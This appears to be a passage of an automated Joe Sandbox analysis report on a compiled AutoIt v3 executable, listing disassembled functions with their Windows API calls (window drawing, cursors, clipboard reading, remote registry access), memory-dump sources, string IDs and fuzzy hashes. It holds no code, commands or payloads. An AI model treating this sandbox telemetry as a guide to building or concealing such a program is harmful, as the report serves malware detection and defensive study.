                                                                                                                  • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                  • API String ID: 2910397461-517079104
                                                                                                                  • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                                                                  • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                                                                                  • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                                                                  • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __wcsnicmp
                                                                                                                  • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                                                                  • API String ID: 1038674560-3360698832
                                                                                                                  • Opcode ID: 65fc6129c27a0e5b9038aaf471882948dbc31deeea1a7772db1e4d1b886b8c94
                                                                                                                  • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                                                                                  • Opcode Fuzzy Hash: 65fc6129c27a0e5b9038aaf471882948dbc31deeea1a7772db1e4d1b886b8c94
                                                                                                                  • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                                                                                                  APIs
                                                                                                                  • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                                                                                  • SetCursor.USER32(00000000), ref: 0043075B
                                                                                                                  • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                                                                                  • SetCursor.USER32(00000000), ref: 00430773
                                                                                                                  • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                                                                                  • SetCursor.USER32(00000000), ref: 0043078B
                                                                                                                  • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                                                                                  • SetCursor.USER32(00000000), ref: 004307A3
                                                                                                                  • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                                                                                  • SetCursor.USER32(00000000), ref: 004307BB
                                                                                                                  • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                                                                                  • SetCursor.USER32(00000000), ref: 004307D3
                                                                                                                  • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                                                                                  • SetCursor.USER32(00000000), ref: 004307EB
                                                                                                                  • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                                                                                  • SetCursor.USER32(00000000), ref: 00430803
                                                                                                                  • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                                                                                  • SetCursor.USER32(00000000), ref: 0043081B
                                                                                                                  • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                                                                                  • SetCursor.USER32(00000000), ref: 00430833
                                                                                                                  • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                                                                                  • SetCursor.USER32(00000000), ref: 0043084B
                                                                                                                  • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                                                                                  • SetCursor.USER32(00000000), ref: 00430863
                                                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                                                                                  • SetCursor.USER32(00000000), ref: 0043087B
                                                                                                                  • SetCursor.USER32(00000000), ref: 00430887
                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                                                                                  • SetCursor.USER32(00000000), ref: 0043089F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Cursor$Load
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1675784387-0
                                                                                                                  • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                                                                  • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                                                                                  • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                                                                  • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                                                                                  APIs
                                                                                                                  • GetSysColor.USER32(0000000E), ref: 00430913
                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                                                  • GetSysColor.USER32(00000012), ref: 00430933
                                                                                                                  • SetTextColor.GDI32(?,?), ref: 0043093B
                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00430959
                                                                                                                  • CreateSolidBrush.GDI32(?), ref: 00430962
                                                                                                                  • GetSysColor.USER32(00000011), ref: 00430979
                                                                                                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                                                                  • SetBkColor.GDI32(?,?), ref: 004309A6
                                                                                                                  • SelectObject.GDI32(?,?), ref: 004309B4
                                                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                                                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                                                                  • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                                                                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                                                                                  • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                                                                                  • GetSysColor.USER32(00000011), ref: 00430A9F
                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                                                                                  • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                                                                                  • SelectObject.GDI32(?,?), ref: 00430AD0
                                                                                                                  • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                                                                                  • SelectObject.GDI32(?,?), ref: 00430AE3
                                                                                                                  • DeleteObject.GDI32(?), ref: 00430AE9
                                                                                                                  • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                                                                                  • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1582027408-0
                                                                                                                  • Opcode ID: ebebb6bd52b4769b1932b3ece2c5d06f41e5b199af14daec21e9db05c3259182
                                                                                                                  • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                                                                                  • Opcode Fuzzy Hash: ebebb6bd52b4769b1932b3ece2c5d06f41e5b199af14daec21e9db05c3259182
                                                                                                                  • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                                                                                  APIs
                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                                                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                                                                                  • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseConnectCreateRegistry
                                                                                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                  • API String ID: 3217815495-966354055
                                                                                                                  • Opcode ID: 023147ff811d97fa000689a9e560624c42fad923cbf7f5c9ce2b6dccb4cfb5e1
                                                                                                                  • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                                                                                  • Opcode Fuzzy Hash: 023147ff811d97fa000689a9e560624c42fad923cbf7f5c9ce2b6dccb4cfb5e1
                                                                                                                  • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                                                                                  APIs
                                                                                                                  • GetCursorPos.USER32(?), ref: 004566AE
                                                                                                                  • GetDesktopWindow.USER32 ref: 004566C3
                                                                                                                  • GetWindowRect.USER32(00000000), ref: 004566CA
                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                                                                                  • DestroyWindow.USER32(?), ref: 00456746
                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                                                                                  • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                                                                                  • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                                                                                  • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                                                                                  • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                                                                                  • IsWindowVisible.USER32(?), ref: 0045682C
                                                                                                                  • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                                                                                  • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00456873
                                                                                                                  • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                                                                                  • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                                                                                  • CopyRect.USER32(?,?), ref: 004568BE
                                                                                                                  • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                                                                  • String ID: ($,$tooltips_class32
                                                                                                                  • API String ID: 225202481-3320066284
                                                                                                                  • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                                                                  • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                                                                                  • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                                                                  • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                                                                                  APIs
                                                                                                                  • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                                                                  • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                                                                  • CloseClipboard.USER32 ref: 0046DD0D
                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                                                                  • CloseClipboard.USER32 ref: 0046DD41
                                                                                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                                                                  • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                                                                  • CloseClipboard.USER32 ref: 0046DD99
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 15083398-0
                                                                                                                  • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                                                                  • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                                                                                  • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                                                                  • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                                                                                  • GetClientRect.USER32(?,?), ref: 00471D05
                                                                                                                  • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                                                                                  • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                                                                                  • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                                                                                  • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                                                                                  • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                                                                                  • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                                                                                  • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                                                                                  • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                                                                                  • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                                                                                  • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                                                                                  • GetClientRect.USER32(?,?), ref: 00471E8A
                                                                                                                  • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                                                                                  • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                                                                                  • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                                                                  • String ID: @$AutoIt v3 GUI
                                                                                                                  • API String ID: 867697134-3359773793
                                                                                                                  • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                                                                                  • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                                                                                  • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                                                                                  • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                                                                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                  • API String ID: 1503153545-1459072770
                                                                                                                  • Opcode ID: 1ac4a55a50d05bb1b4900e4d233aeb2c61a58a12f44e5447fb1ff3ae61d32a4a
                                                                                                                  • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                                                                                                                  • Opcode Fuzzy Hash: 1ac4a55a50d05bb1b4900e4d233aeb2c61a58a12f44e5447fb1ff3ae61d32a4a
                                                                                                                  • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __wcsicoll$__wcsnicmp
                                                                                                                  • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                                                                                                  • API String ID: 790654849-32604322
                                                                                                                  • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                                                                  • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                                                                                                  • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                                                                  • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a5bb1bd3431bb1c28094b6c0267df3d93e1c31e8ab34a396917d22817328a592
                                                                                                                  • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                                                                                  • Opcode Fuzzy Hash: a5bb1bd3431bb1c28094b6c0267df3d93e1c31e8ab34a396917d22817328a592
                                                                                                                  • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                                                                                  APIs
                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
